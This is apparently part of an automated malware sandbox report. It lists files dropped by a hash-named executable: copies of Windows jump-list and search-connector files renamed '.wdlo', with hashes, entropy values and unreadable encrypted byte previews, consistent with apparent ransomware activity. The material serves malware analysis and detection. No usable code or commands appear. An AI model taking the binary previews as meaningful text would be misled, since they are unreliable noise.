                  Preview:.....kHl.6.R.[!.=.P.`9O......:#F.jr..l..r..*[P.p.o.>.....Y......}.ZL$E.......V.).o..V./.T.3.s.A..{..P.......wJ%C{c9..8.B)_]A..C.]@...iIEP..?...>.irP.u....i.@.T^B.(.s.U.....c.:-..'.)&\.........[.U..8.m*..U..&..xPo.=.u..u..E.e9.)q{7...\.....7....5.J..?..B.t....~3.<..P............"..E.....]q.H..(...yXx6...0)...2p..N...O1....KSc.....V.W.B/.Y^E.O.D.A.k..6...Qr..P.k..H..3.P<.M..5...T.Y....I7........K....i....F/@GW..UQ...-....f...D."..5...L..@..G&.l.-M~itYc.....\.9....Sj.....O..`B......t.....:.......-..........]ft8.(+.c/f.r!@Z.{.\.q.@ ....!)..I.mF\.{..tw.x..r!.J..|..<..)C..m...._y...H~....^=.?..4.[....(.2VV.:...v.....Y`t....UW...6.......g..n.>...?.u/h@.$M?...d..DAg...s.jo.@&;.......l[Q=r..W.....e....HM^.*5...o..P:qqR.nb..S...0|..6l;z...x....D#5P0.9...vKO......qJ......Z.C..)...W}5i&...o..;..H.66.....u2....-.7..2.b..m.`Jb..i*.......Y`..*i...."$..Z.)...*..$<..a".x.?#.:.V..{...)w.;...5..c..%..(....../Hd.O.F$~..W..J.E..g.....@...0..gG.

                  C:\Users\jones\Recent\AutomaticDestinations\770ecebb12dff1ca.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3406
                  Entropy (8bit):7.943566230325546
                  Encrypted:false
                  SSDEEP:48:iUbtey5Jrxvj+EFGR3cXkSwlzEc3qNW7MFhl2evYYmKpXjAQ5JO3/kQ2Qdet2L3D:9tey5/bd4a99WMvY3K9hONeti
                  MD5:AEBB6B6F176B6EBBA2ED4D51B00331C0
                  SHA1:CADBB4E24C4DF3174A34333C82DBDBCD75C43B1F
                  SHA-256:010B5A9FD215DA3AE0AD812CDC7C1416CA9E24CAD222E00094D540DC554EC2FD
                  SHA-512:18D648409786535D335748E102111EBD96D8C8ADD2FB1466B3CE9E967BE49AE61B50DA9BF8611E5423E3B4AEFD769B209ED10FA763FF5523805484CEB9D63731
                  Malicious:false
                  Preview:......r..uZ.....<...)..o<...Oe. d.>......e._.Z..{...).....9..........mF..../.......*.._j7.....t...QF;.$....:..b3...b....[......).IP..S..0.x'.....F)B.....h..1.pP...Ca..[....NPG..A...y..?....}...;}K...WU.>.m.....tt.}.7.j..KU.......{/...E..........e...(..eD......../.....a ......`%...5...JQcn.W.j..B....6.r..G...W.j.Sq.3.WL...fv.)._.wHR.kI`....Vo7......|L.....9G?....+a..<l..,..... `.Y1`....Q.1J..,p..:....)g.....v...M........l}....Ak..H./.Z...n..~G....e.X..6.....?8....b/uaK....E.O,9.E....5.5x.d....p...N..@.aX.....R..T.A....^.}.OR..[.Y>.t.B..*..1.............>IX..ZK......}.3@+trxu..$...K_a...g....[eZ.e.F............>..p.K..q....dbc.!u.2..{Md.8.....p..x........*..t-.......go..u.!0)8Ho..@:`....!.......F.~...4....x..M..7.../FU....[..y..N..=...O......73..{k..........n....+.*6...0..~.$.hd?HI..My+0#..o.H8&\..........t..........9Ve.iX"q*......D?...+.e.ZPU....I9.....*...p...p.....+0..W.Er....-...#e'..:.....8...p.Q[P*?.E..s.......#.?.....4....3...

                  C:\Users\jones\Recent\AutomaticDestinations\78f0afb5bd4bb278.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.934166560936287
                  Encrypted:false
                  SSDEEP:48:AV5J5eAGH0LI5UsN011YatzXmkEFHgpPDvFAz4kS+sUSON6TaUD18NBHY6t3nD:APJlGUs5UsN2e4W7FHiPDvGzvSlUf6TM
                  MD5:F97F1912F3F06C0477D7D27F2B46209F
                  SHA1:1489EEA5DA5A5AC5952CAB5B9A3735B598DA0422
                  SHA-256:FDC797830A5607D12C1681ED071F843B4040BF08D8FBAAE587DD347D9207FECF
                  SHA-512:3375BE112246C984ACAED38D05CA0CEAA2EFF8013B419AC9572EA1CD87474DCA9E71251E267850918374B21D1F750C58FBFA1ADDAC3E06EEEA6C91C09C4316A9
                  Malicious:false
                  Preview:........;..67.f\j..9..Mk9...)...,.,0w&t..)..M.RV.u..8x.. .bc.V....<.WW...ij.W.o.q^CK.gV..(0...E./#eB..t..C[.Q.{...q.........;.0.L1y.......l}u.z.....<..&.p...h....v..4C...<.?..$..>:|.3,..C.."..W.1Z,....L..,...O/..D.`....2jj.,.*..=..9P?1..(]..PS..~....t...l......WI..e.f.B.......<.oR.s&Y..&..Jc....{.L>..$e..".>.2..nO.{.*.......J...4|y../t..s....'..oSN-.[.6....^.....,...v}..{......\... .g.{.......6.|%g.%#...,g...\.3.4S.V6.#...|. ..=..........O..Wa..;.y.....R..Ku.|}...<y5^...7......*S.=<}.Ilu.+.5..#SwE.T..?..J+...oa...z....Y.... &_....v..+...e...h..L0cX.u.....d....Vc..`Xc.....1.q5T.G....q..Y.((...#....q.S...E4...Li.....b....'!.O......B......r.=..........K1....*fK.. *+.q.!..`.....2..|....<....VF{...3[XJ.B...f..;.fn#a.W.........MX..H....>.....YFm...I.*..N.. L.*Fi.QC.......C'|w....B..m..t..B.....B.:.Y....3...Ka.7.y..D....o|..8.6...+..{|v...w..(...=4.:/[..!..w.."."6!....o.......pc.0.....1'...m}v{xi.t...v.....+.e;.=...|.40m|+....u..].W...........D.

                  C:\Users\jones\Recent\AutomaticDestinations\7e4dca80246863e3.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5966
                  Entropy (8bit):7.971702624365043
                  Encrypted:false
                  SSDEEP:96:a5JV7dlWNmgkFSS5xv6hYLXt4TT0U7dC8481dDTEkVSyCueIUu/3jUPZzdyIQp:aXssB5xCgXON7X5vDTlAy1UEjqzdcp
                  MD5:B73DDB4F95810358F026C6D1471DAD9C
                  SHA1:C631F834E7A1E21C4519F9E9E4D0B2A41899A5EC
                  SHA-256:B5E32A4737FD750879A032958C822A45BC8E347417463005AA040DD161FCB7D8
                  SHA-512:72DA7E492EBEA1F6449A5B5238C62FFAC54C48A94E0D6E02CB90CCFDAD742B43FB274AC057396C4CE7711B85AD4718E695CA8CC1199DF35D8D35DA3852C9E678
                  Malicious:false
                  Preview:.......fbk..^..8]1.S..:...@...../o...k3.,"...-..X..?;.;1...{..DP.)..[.^.~..twU..$).......7..4...t?I.v....+.![..r.....C..06..K....l2.z0.^...}.59,"........."...@1....g..R'R..0xU...-.-)._.%..-..u&...v.23...P....X.?.;.<[<....C...L..R..{.I.7..&8Kpud.j..j...l.B..E{cJ....c2.U..6.....<.7..y..z...Z.Z.].vk&sq.n......0.n.q...'op.D...#;o.jN...-....6i.....i.....+.#...L..x...L.Ao. ....X&......P....T....V...Y....A.T..&....s..p..-*_N.m]..{.c.G.@V...g..A.Y....U....P.3.=.m...k.yQ.hb.X3.....Sc.-...p$...?.D...2./.y.]//.D..T.....|..".7.....<N.D..Y.R..Kr.]...Ys*.?fQ2.t...3{~.V.\......].{H...CQ...:L..kx......p&6....$..q+"........Z..G....7|...Bs).$..1.f.S'.T.9i.*.~..w.i.+G.q.~m7X..P.{.(.....;`.e...my)..Z...l...5J..rxQ0......UXu.R.....<...-.5..........8...q&B.....1..i..U_[A....8.(...!...0w........z6VF.....\......I.M.Gm.}%h^..y'.qn&.Z...I..E."..."[[..f@...G. .}...T....|...G[.'>........`g...3.)..}.k.`7......}`........Y..o_L..[G..7..S.f._H.. f.Fw.>.v....l.bfX..

                  C:\Users\jones\Recent\AutomaticDestinations\9c08ad74ad8708df.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.941866171153655
                  Encrypted:false
                  SSDEEP:48:T5q1fbUoefV76Xpp+GLjAth7+wIcdXCuwFftZmLQrNdVAKfx3nD:UBUeas8IcdXCL6E11
                  MD5:CD663CC6683C680C8510CB6544EC44EB
                  SHA1:60FF724B66ED7643B66AE9BE0297BE0DEF1429DE
                  SHA-256:1BD9C783CE2F3F71EA2BCA88C5B554C10411AF4B91A3C534A6241B8474637DE2
                  SHA-512:A7B493AAF02E9E46750D034DB12593C8CB0379D1AE7E5C8F4FA15CEF09D33A576ABD9937747210C15AC7A766B19B8F1651FD2F557CEF58DAA02767873796BE9F
                  Malicious:false
                  Preview:....X/6j~.|lf..=ZD.?..}r...z...8j..}........m...0.....4.x...?..U.*.~....K9i[.~o. .,..Y..N'.RmMl]0{<.#y....Eh.b..g..!......P.).l.O.k.....pi.oKJm..J...?.....+2..E....M......k.e.8z+.C...........<.G.b..%....0.A&...Cle|gC..>.G...n.g..X......`.e.. .P0.t.xZ..K....u..K..o.[.m^.P\bi...P.~..`..3A.bG...[.n.....2.mY.^...rO."........./G.I...&0WuH..].Z.~!n..\....;.%.F.2;..m.........d..TQ.#.$p.u...!<.Mb.I..8L.e2.RI]...?....g....O..9....wH`....I.g...,....2..9Q..r.u.$.M.@i^..;.|..<.N.=L.8*..).#5M.8.p.[(.X..<........7.l5.."...D/ ..)......h.=..-.*...~..p..*......q4.e6:.c. ..]..O!..B.4 ....[/.%..).Y{G...]S.Aw...=.&.?......f...OG.^...T....){:..g`...y.5......M.DR..8..%Q..]...@.V..i.x...n?..M5j'.AB...._....f...L.V.O.+.......Tf..>.s...7aDD:..E......E....N.d.Y&.n...j...:.C..M6~.`\Zr......z..."Y.]..A....@....V).~.....#A.1......de.}......,....... d...Ye....e...f......p.j`.U4^....<.#0..IEe..uH.w,....T.0>..:...[.6.P.5...Y......IHC8......q..m.lKB...".U..>../......"

                  C:\Users\jones\Recent\AutomaticDestinations\9cfafb05ce914942.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.931996086236062
                  Encrypted:false
                  SSDEEP:48:TI4hyqlyeUd7l48w4YR3Tl+qTxaCZauMOtZ0fBzSKnuvjEC+lrNOwu7JU3nD:VkH3YRkiNZaktsSKuvopRFu0
                  MD5:C2447EE44170FB2DCEEA2FB7B547117E
                  SHA1:B98047C7E16D7083B343BC0AFB6B625C1BB64101
                  SHA-256:D60428D9AED621A133C37C3A0270FB63B431105019B05B007A57A6A715A47B52
                  SHA-512:EB61D55ACE57AAAE1528F774832A51704728C44BEA0D5B050B7BFA0B62B265EB933557BBE0AC8AB3F57B0635CA88FB7ED49673C8996B0CD02739C5748376FBF8
                  Malicious:false
                  Preview:......G.3.....R7p\........5......E.4...W....8ZN.|.....K.C.{.....9...Q.}..V.`.&..R:........4..U.73..G.U..N_w...'p.....%..n..+..y...6..=+...>.o.5^.[z.Puj......T0,.B..5...goy...>..v...D.......x.I.....#..2n..N.-k.\w).|..m.~"..V..}....Y.]..g..}..Bn!>k.c.z4....P....Mm....y]fqp...!.I)m.+.Wx.:WG..&.t....v."..eR.I.V..NB.%]On...-a.../.UEA.....=....T.."~.!.....M.......N.G..sOD.4....480K.y......x^q>.....h........b...6..q.)..5R..v.....C.`.....l....c..n..Z......-_....k_........{.[..&;..1t/...e.x.8.....2T..!.]m..l..K.-...w.y..Yek.6..Ri....%.a..... ...B.'.i....^?.W.0.}.. ,.Z2$.%.-..w).,.9vtt..b.M...j..H5....H.g.3...V.yT......./..=i.mV.....c`(..#`..n....C.ps...j@..+^.%.X.#c..&.}q~p.#../.....T.;..&.B&.X.N...xu.?....1.!),a.P..._l.H...o...?..._q.I..)o7.......,.\y..%.^...9.D....Zn.|K.ki...X.<...jV..]...`HA.........OCda..h. ..B5..).l..Z.'m..8mvn.qI+..A.j.......&...c?...I.qA6!..q#`U..ypg...D..1...AmM&.uh.%......W....q...;"a.."...,Y..v7....I.3&'S~{q.}.....

                  C:\Users\jones\Recent\AutomaticDestinations\b8ab77100df80ab2.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.934740181118819
                  Encrypted:false
                  SSDEEP:48:i0B8Juq6jS73nHfiKikdP5anzMw8dqSmhPsSISwzMgokz+31f7wet3nD:i0B5KT/VdP5aAwMkITMgokqF9
                  MD5:6BA87EFEAA174922578AEB5ABC96CF53
                  SHA1:3492300F693B4C32A8E708054DFF567E694FFC80
                  SHA-256:A1E280C4F47B4679892AA112AE2451324F736CCE5114CD2E8D75C8987B84F781
                  SHA-512:EECD5D961C35BE0D6A92185BF82780408F9309F4EC47A73DE36F30844A411C0974D1F9D34BF2C7B577E68009B9D195A59677AC99B420D9142716103F10D28C1D
                  Malicious:false
                  Preview:....R...J.T..^5.N}......BE...l.....L\...u...U\dy?..;..a..:..?..aE..1C.Bb...!.......L.....[..t63[..*...d[...5......&g9.7........Y..@......v.KHa....^...'.*....[...u5.f\. ...(....?`!.N..z1........j.C&.......d)DJ2...C..MUq%...-....shC..03.5.'....V{$..b."..D..{J.y..]eAa.0..}..:.p3.i...'.A..J*..w......?:l&..L......B.T.....].......JZ.Q..s......q.|h.I..;D.)..C.{W....S1,.[..o.h"_..^M.f..0_..6.z.]...........\..G...A{. q.Wp!.T.H.DSUv..G2..H..%x....v.n..i..).E..:^B....i/...k.S./.o.....5Z/....D...`_...U"..i...f.U..........A.......d;...M.......H.`.,..."4`H.6.}..N..,/.g.H.....H.L&.....8.U..0.B.:........f#...../+.7k...M...._NZ.Q..b..j.D[.$x_...g.U].Oh%..1.A........$....,.......*06...|......&.../. e>.7NAe.9.j3...t.}.....P..SO...f.R8.LTo...F......z_...Z...p.|_.w...M(,...C..\......F.aEI.F...>.G.5.#D.U....../....Rj..RY.(:....t...w3.ct?...{...A..P A...W$8...F.}....2z.-... ............+.y..W H^.....n$...5>.9o5.)...}......p. .1|...j.....Vd.,c......s..?.."..J....a...U

                  C:\Users\jones\Recent\AutomaticDestinations\b8b3a97bfbf120b6.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.9322759036215436
                  Encrypted:false
                  SSDEEP:48:cCw9T2EfaRtEVfdkYLrBH7bMhKoNbR2Qis4j60TxQ5aIY0v3nD:x+yEfuENiYL9HUKoNNEsa60TxUj7
                  MD5:57033D2D98286A6C04421091ADA52454
                  SHA1:618EABC2A42C6F163B55D6794F1F2E9F3577DE1D
                  SHA-256:A777236E0C8C1F2F4D8F458A4249FC75DB07135BCE3B6A4CCDA34B669153074F
                  SHA-512:0E4C0B90F3BBE7BF246605B6C7364A537321204D45B486933C5C03B7A2112EBAE8979C5C28D6080E6B51C0BB223766E9DADB59286032F1C2D236164814455AA1
                  Malicious:false
                  Preview:....Y...S.BRcv......XG3OK.Z...B6..oL.. .e.%wldH......l.......;..8.14./.S.z`.Ag.iG_..W..Q.,.Y...../?x3X..........6D...u5E.......d.h..Z./n0.F...X`..`.s.....,..r&.*..)Q^H^.z..,.....f.@l.K,*....\C.....UK.P..x\...."iu.}J.tP..$......v....WXe9..UW}%.{..p;W4....+.......,.S.O...f...|............;..j:..<......r......z....h..H.0......vu.w..5.R....6....DK..:..q..kq....j....Rbb...7>.S....y.h.....C.e0s......i...0...fQ....C...q.nj....2j...xL.i(..C...0....#..0.(+..d..39{...ZKR5...'..<...]2..0..#I..:..Tr.......fwv.xt.x..>.>.9N..!s)..B..&....`..n...C...5....~X*..pB"op.--_I.z.....3Y...#.U...=.c.V".*...d..z.>......[......j."y~...U.QQs.G..-.....n.5s8......G..xG.;V.@f~SB/ ........<..h.8.....`..Pz....K.V\B..(J.*xn..p..(c.";$IA=.|.............Z......2.........?6+..'"}.. .]..H..P......&..tV......S.....N0.oyZ.6.W.....mv.*J3pA....z....BrRb....(r_....<._...#.j2t.T...k.i....*...1o.=..f..B."T`&..#e4.T..b.....\....?. .xDn.P....J..j1.\...K#.m b..........W...O[Z..JV.i*.V.[.

                  C:\Users\jones\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.938115920769482
                  Encrypted:false
                  SSDEEP:48:EIjZawrtA1ygHGOlselPedX5c8pGXK0c4no1T03jY58CzDAcNat4IKJ6tLiF4i3D:pjYwrtEvO4erc8pOK01qT0TUzMcNatch
                  MD5:581F975E4CCBFA4C31142A627A4583FD
                  SHA1:9A0ADF25049FDA1C8E4DB16BD269A51EACAA5036
                  SHA-256:BFDC52FDFFB8F9F0B4FAD15CC93D3C22D108209729988C5DD0F9003E9BBE2241
                  SHA-512:2B8D07FE2862CE1E20ABE854A15B5E5ED19A0F0FA87137972D5C5303C651FA9134BE1A07A3E6FFB5ABCC942DE221E9019B79D4F828136016A9EC19F60065477C
                  Malicious:false
                  Preview:....B+.x...W..R.'YQ.%..|a.]e..... 5./1..d{82u1Y.t...qr.2._....v.+..D<..s.f&>..y..D.I:~@..h.d.!..Y..f...gX6..>t.E^...[..P.....p(.....G,....k.3.Q....z...T.I}cs..\.T..]e.=<.J.B.h{4>Y..L...je.n....o;|....".('..M.1..Ta..B.N<.....F..{].....JI..1V.a.]4.@.'..s.....EG$7..iU7...#1./..?B.V.Z..E...>.r.;...EU......jY..0...&r......s"w.N.6...b...|X..........J{}.9.B..8BKN.[~:....s.)|Y.|....1t\-m.h....5.j!'.a.0...O.....a.>..n^.....E.....0.P.=K...n_r...e.{..dt.^..A7.Z..4.'......z#..W.u...s...o....U-+...%..?.r...e<l0.}T..g...e.qj6.....>.......B.qzw.D.>x.f/j..Bb...N.....O.....Zq.+.g(.Z!....PD.6Y...y......-....-..7...-.G-..S..x.^.bd.}&.......P.p.."......_..L.$...ZE..\D.q...+%....n...XF........DQ.e..-9....i.R......6|.X5_.)...E..SZ...M9... ...f.[Pn.35./$A.t'..I........T...........}.H...K.E..m.wAaZ:........7..!'T..S.VL?......]../.d....Nx....J.z(..Xb7..r!..`.}_..C.e.=...^..F......k/.h..@..g*.G.Kf.J.........lg..iO..T..i...E......W..7.....*{'....fb.....

                  C:\Users\jones\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):9550
                  Entropy (8bit):7.980673983291734
                  Encrypted:false
                  SSDEEP:192:X/qAohJsvOalPvEjnlF/Z22MPK8q3MrUDaR0a5Kz5VLemo5HKc:XnAKD3GF/jV4MaZoz5VLZo1p
                  MD5:6D7010A8E6348906879F0508BA7342BC
                  SHA1:74A41C2177332BEBE579E5A39EF14874D3A5F9F5
                  SHA-256:16AB8B4ACE6D9EF1ACAEB0A57E5A544AF6EF7C6A45ABA01EA9B4F3722141DC71
                  SHA-512:0CE57EB0D8F0F7F09156CA68FF03ABCACC66D14326EBD5F23F3CC57A2C844839538528E146E920635F95668ABB73B8132777F704F711DB4584060265D611177F
                  Malicious:false
                  Preview:....)..dJj...)P....li|.zT.......:8F.y.k.^e...W..HuH.4M.6.....2.#B.C.#...%h.C..T.C.NbR.Vxt0:.c.. z.d.=;..H.........#..n......vX^..3.....xiw...*...S.'...n..|B.5....".^;I...n.{.}-......I..(..d$.[.H............Z....m...._?.....6..}}X..3.9.....G...F.|)Ga....:...4..:.O...l.7/a...u.$..9`.+....&Y...|.A..~.N.....\;.v..A...@j..\p.=.3....b0.?.5I.3...{4}.1e.]....XZ...c.2....}.I.o.p-V.y..u.U....8.0 .yd.:.C..Q)A....b..D...".f.%!5%......[..*]. *.....U.z.....%..{.3...O..8..-.j..2.t....-C....7....>...t.D..V.R..p\...`....2t:J....f.<TP..$.4P9..."w]....<...9.g..K.U."...:......`.U.@..Te.>.D.[$5L]..Tn..Jd.f .$......T)f....F....*...[.56.....hz1]1...n.C..{...\.^...Z...C..D~ .3..33y.<...U*...w......4..B.".).Q..4,..-Wu...V.R...O...J..?..PW...k... hU)h......q...me.....M?:y.......(.N...x.oR.:.....E.-.Y..#..w....H..yv.".+..iK.RX.1&......d..sS.'n.D..I..S.!.o...c.....Ok...j.mh.7..{.6...*9...E...Es....%.....B2.2.b....p..L.....Z....p)...}..qw.A/J...h...B.H]........

                  C:\Users\jones\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2894
                  Entropy (8bit):7.935700948709438
                  Encrypted:false
                  SSDEEP:48:68YugX3xWEmqEpxfMmNFe3ftQWn5/NKi7KAqS/Fjq8m8Hfhq6jYLBnlUN9raPXd5:fYfXhWEGdbe36iFZnqSRoyzjYLtlUve3
                  MD5:1B58752F17A430735FD396840AE12E48
                  SHA1:D87CA8E56C4D2151320D26A5F8C873D7797CF470
                  SHA-256:60827093305193C20C6012480F80F41CF9B03324993F449AED099F72B327DC48
                  SHA-512:249C701E41C3768C35E5A541AFC42B99E40E5CF7C3DF005E00CA458C049D6949C55229AC2D004E3B1402DD5B5B3FECC89080B0BEC0AB8DAB4A9AE2D90055CE9A
                  Malicious:false
                  Preview:....y~..\..-.g.8.....$&05......Z./....Q..D..].j...?d..d..wV..pj..hop%....I..'...~.6U!K.,.].....]E....Z1.....S.c.?...Q....!f.w$].....3.0.V.._.%.....~....v..._...l....HW.P....c.@....Q..S.u/%.$.].L.B"..!...?.e..!...(...#.W........!....j.,..Y........;...A..Fc....k(.nh?.....V..5.(.OTA..5...zLN..........hn.....P.._ k.Ob.."c\...R...)..[J...b'zu.#...4./c:2.=.J..nw@G.o-.y..u..s...h....}....e(x..%C...%"Io.W-.j.[........=..Y..n.-._.9.\l....T....`..OH.Rzq....z....Y.....s_.....\T.c...c.4}.f."..a.t..t.W.....e...h.;..Q...k{.U..O.....M|....0|k.i....V..&{..fp..D......J..7.._A..D~..r...4w.a............ll..l>..;Nh.O..".Kh.+......~...$....[f.~....6fjy./..bA......J.e.@L..?.c.;..+.<{2:.8.%t.r..5ax ..z. .....KB".........JGJoSt...|.[.%.:....87.."..V...q.>.sQ....%....VN. .2`R"E.cI..o.n.._..zW,.d.......I.ip_mw....".zI..t`t.Y<.....e....|.......bA..t........V.^.9.S..`..k....h....e.f......JBt..f%jA.f.9zP..Z.S..4~..63.!....U.GW.......G..l.'...T......1..Z..FB>..

                  C:\Users\jones\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.304473312344099
                  Encrypted:false
                  SSDEEP:6:pFtOnFzjJ+NXCPBPd+K+W7OEZ+LWBkRJurM/pxVGth9vlOsVolWbz6Wcii96Z:g1jJAX16O6+L+Y0rOpxV6PX36Wcii9a
                  MD5:C56ECFF8B97B42CD576EF360AFB72BC7
                  SHA1:1254999C7B6500F6F1A8C7229B149EF55098A619
                  SHA-256:10A8E160B60E27743EDB8FBA06FF8CD1913F2711B1F2827EE08EF081131831D6
                  SHA-512:97E2238EBB6905F1084867603230D348370C4182A8ED8D4298570FFEB584CBDD19D87165EFF15BB6F717D16DBDAB5C993B7D64E96FBD3578A2BDB7E7E4CF1711
                  Malicious:false
                  Preview:......sI...Ha.c......c....'b2.z..2.ga. ..u....P.{.~...L..w.,(.F.g.X`.B.P.....h.Q.j.....5....]q...#.Bm.xa...C[.=.a....3kQ.^.0....l..1.l..p.1...M..A|.<..(.....t^Z M.wcd.F....z.......<........u.8.P[..v.z...X.s..6.`M...L9...0.$......2..`o>..Sq...4..L.)J...d.L. /..rNNq...+.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.381874166937805
                  Encrypted:false
                  SSDEEP:6:nE3auc/CRaA0eOgotq9bNbAl0R6YIyddZscksD9yjnUc9ROsVolWbz6Wcii96Z:E3af/CZ0eOgotq9bNwKd0dsETp36WciD
                  MD5:A71B4F6B71886555C27B97684A478394
                  SHA1:57B99D417D074146FE0CC4FC91A803133729E304
                  SHA-256:6000CE86C8253EBEBD4557E0992245C484D9295A56B86CAB7DCDC5D8493B5742
                  SHA-512:E3C69D4CA14F25FA8B59AE80A8DA4A2D28CE774D18DA5ECE6059913AF2E5E7AADE8A8A03193BD1855176BBB01BBE2A3977932506F7819A73EA8EE7AD33E6FD1C
                  Malicious:false
                  Preview:.....8 ..W.OmHnU.,..p.J..R.....|.4..dZ.W..9R..b....~...h.....]...ow..k)...x.E.....;.....u.._.(e..>.X..9..h...zz=..w..f}...J.o.|...).......)..8W......X.jY.Y../..d...O.....5......PQ..C..\....m..`.i..........Q...\..#......_...P5.a,........Mx.\V./...v..b~.@l.}._..Ro.Di0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Recent\CustomDestinations\f18460fded109990.customDestinations-ms.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.3630057660937736
                  Encrypted:false
                  SSDEEP:6:utznh7PapJZRRahCSd9lLpcfviZiPwJgTFVFhXUGduCYVwJLzybOsVolWbz6WciD:uRnpPihRah/d9lnZi4s/yViLzy936Wcq
                  MD5:2BD56A8F3E10212E01803A87977608E2
                  SHA1:46B7BA4EF56DBFEB8F1A760A36E335EA175C96BD
                  SHA-256:5FF064579648BD5E135346C1E91444C4565789BCD333D8EEF43712D91E8C06EC
                  SHA-512:524E97E5A78C98FB65E76FC4A2EB678325E0E5FC3BFF4220A5A50DFB13ED63BBF81B18E66DF44334C28868874F31D41D48F3A0A75CEAA32ECF8B1ADC0C7588D3
                  Malicious:false
                  Preview:.....u......T.v..WY. cQ|....`*I.3.=.6.]...Wy.j.%.b,s.2L.S....RL..ls..wX@.../...A.....(......n./.......P.....q.:h....4.7.~."...[.........VJ/...i.6|.lI......qu.`.....WGtFp`....k`..^...2b....F:I.z.F0....Xv..i.H..d..'......=;..r]\....D.T... ..R....v}...1VF......]......6.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1193
                  Entropy (8bit):7.819981402186221
                  Encrypted:false
                  SSDEEP:24:Z/plRuyzDMbdd+ITi0CBQaoUP2EOq5923Ruo1qKSTiiA6wn3zbD:ZrRvE5Tij2JqfWOlsn3nD
                  MD5:1B19B39E53AB31A248BEF875D4D1ABF0
                  SHA1:BF6BEE8C44990BDC31726B630DDE12A744D8B1B9
                  SHA-256:E193DFB81AF1EA613A3A6757FDD863BBD06A7D4AAD8CB2997D452CA86B2BE56B
                  SHA-512:9A5320CFFEDC435DEFEA1DF523A5CDED6A763A7334F0773CC7D41380F8B6FD35C313352F086648609D5F5FE59D5947093FA9546976FE3A0EAC321264A0248A12
                  Malicious:false
